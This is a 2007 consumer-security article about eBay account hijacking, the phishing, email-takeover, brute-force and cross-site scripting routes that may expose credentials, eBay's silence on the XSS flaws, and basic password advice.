Vulnerabilities in eBay site may be to blame

February 5, 2007

By now, we're all used to seeing those fake emails that claim your eBay account was hijacked, or claim listings for items you know aren't really on your account. The goal of these email, called phishes, is to get you to follow the link provided in the email and enter your login credentials on a spoofed eBay look-alike site, after which the credentials are logged for later use by the attackers.

But these prolific phish may be a red-herring, diverting attention from the very real problem of legitimate, non-phished eBay hijackings.

Even worse, these hijackings may be a result of security vulnerabilities in eBay and PayPal's own websites.

The scam works like this:

A fraudulent seller obtains access to a trusted eBay account and posts items for sale under the hijacked account.

The auction either instructs the buyer to submit payment to a specific account (not the one tied to the eBay account) or, after the auction is complete, the fraudulent seller instructs the buyer to send funds to a different account.

The buyer submits the payment, the fraudulent seller takes off with the money and never sends the seller the purchased item.

The duped seller then reports the matter to eBay and the legitimate account holder is held liable. Sometimes these scams even result in the legitimate user being suspended from use of their eBay account for up to a year.

Such hijackings allow an unscrupulous person to exploit others by taking advantage of the good reputation of a legitimate eBay auctioneer.

Getting access to eBay accounts
How the eBay credentials are being obtained isn't always clear. In some cases, they could have been obtained by a classic phishing scam. In other cases, scammers have reportedly obtained the password after hijacking the user's email account, then taken advantage of the 'lost password' feature of eBay. This is particularly problematic for unmonitored email accounts, which often are used specifically for site registration simply to avoid the accompanying spam that often results. Depending on the site, it's also possible the passwords are being brute forced, thus sites that don't impose a lockout after X number of failed attempts are particularly vulnerable.

Cross-site scripting may be to blame
Unfortunately, in an alarming number of cases, the most likely explanation is that the credentials were exposed due to security vulnerabilities within eBay and it's sister service, PayPal. The vulnerabilites, known as cross-site scripting attacks or XSS, allow remote attackers to modify real pages on the legitimate eBay and PayPal websites. As a result, victims of the XSS exploit could have unknowingly been redirected to a phishing site while on the legitimate eBay or PayPal website. This means that even security-conscious, computer savvy folks who would never click on an eBay or PayPal link in email could still have been compromised.

eBay Contains a Cross-Site (XSS) Vulnerability (April 2006)

PayPal Security Flaw Allows Identity Theft (June 2006)

PayPal XSS Exploit Available for Two Years

Despite the known XSS vulnerabilities, it doesn't appear eBay has been too forthcoming about the problem. One victim of an eBay hijacking commends eBay customer service for their rapid response, and even posts the chat dialog with the eBay support rep. However, when reading the chat session, dated September 2006, pay special note to the fact that eBay never once mentions the possiblity of the XSS vulnerability, known since at least April 2006. Instead, eBay repeatedly asserts the user responded to phishing email. To read the chat session, see: eBay's Superb Customer Service

So how can you protect your online assets?
Keeping an eye on your online interests is key. This means logging onto the site on a frequent basis to detect early signs of fraudulent activity. Be sure to report any suspicious activity immediately. To avoid compromise by the 'lost password' feature, keep a close eye on any email address used for site registration.

Most importantly, never use the same username/password combo on multiple sites; (b) use strong passwords; and (c) change passwords often. For tips on creating strong passwords - and remembering them all - see: Passwords: Creating and Maintaining a Strong Password System